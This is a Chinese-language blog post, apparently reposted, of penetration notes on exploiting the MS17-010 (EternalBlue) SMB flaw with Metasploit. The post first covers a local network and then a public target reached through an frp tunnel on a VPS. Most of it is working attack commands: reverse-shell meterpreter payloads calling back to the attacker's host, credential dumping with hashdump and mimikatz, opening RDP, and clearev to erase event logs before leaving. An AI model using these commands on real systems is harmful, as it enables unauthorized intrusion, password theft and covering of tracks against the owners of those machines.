kali ms17_010 內網環境下滲透筆記


一.先用Router Scan 掃描

  看清楚了網絡拓撲結構。

二.使用MS17-010批量掃描工具

  下載:ms17-010Scan.exe  (也可以用kali自帶的nmap和ms17-10模塊掃)

 

 三.漏洞利用

kali 終端輸入

msfconsole
search ms17-010 要是搜不到,請更新你的msf
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.66 設置目標機ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104 設置本機監聽ip ,默認LPORT端口為4444 同一個C段才算同一個局域網。不在的話,就會很麻煩(kali 是在虛擬機的話,改為橋接)
exploit 開始執行漏洞利用模塊
當出現meterpreter> 說明利用成功
在實驗室,五台環境配置相同的機子(ps:都開啟防火牆和騰訊安全管家)只成功了一台。其他的總是出現無法連接上445端口。也百度不到答案

四.遠程登錄目標機

meterpreter>migrate 616 關閉對方防火牆
meterpreter>screenshot  截屏
meterpreter>hashdump    獲取目標機hash值

 meterpreter>load mimikatz    啟動mimikatz

meterpreter>msv         導出hash值
meterpreter>kerberos    獲得目標機的賬號密碼(要是空密碼,就要自己創建一個用戶,不過會被安全軟件攔截)
另開一個終端(!!!!!!!!!!是另開一個!!!!!!!!)
rdesktop 192.168.1.66 -u 賬號 -p 密碼
要是連不上就要開3389
meterpreter > run getgui -e   開3389命令,然后再執行上一條命令
meterpreter >clearev 擦除痕跡再跑路

 五.內網打外網(2018/6/12更新)

 

首先把自己的端口轉發出去,可以用路由器。博主是用frpc。

環境:操作機內網192.168.1.1     目標機外網   222.222.222.222   一台公網vps  111.111.111.111

frpc.ini

[common]
server_addr = 111.111.111.111
server_port = 1024

[RAT]
type = tcp
local_ip = 192.168.1.1
local_port = 4444
remote_port = 7002  
auth_token = 123

//把192.168.1.1:4444轉發到111.111.111.111:7002

運行代理

root@kali:~/Desktop/frp/frp_0.17.0_linux_amd64# ./frpc

 

第一個msf攻擊

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 222.222.222.222 設置目標機ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 111.111.111.111 vps的ip
set LPORT 7002 轉發到vps的端口
exploit

另開一個msf監聽

msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf exploit(multi/handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(multi/handler) > run

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM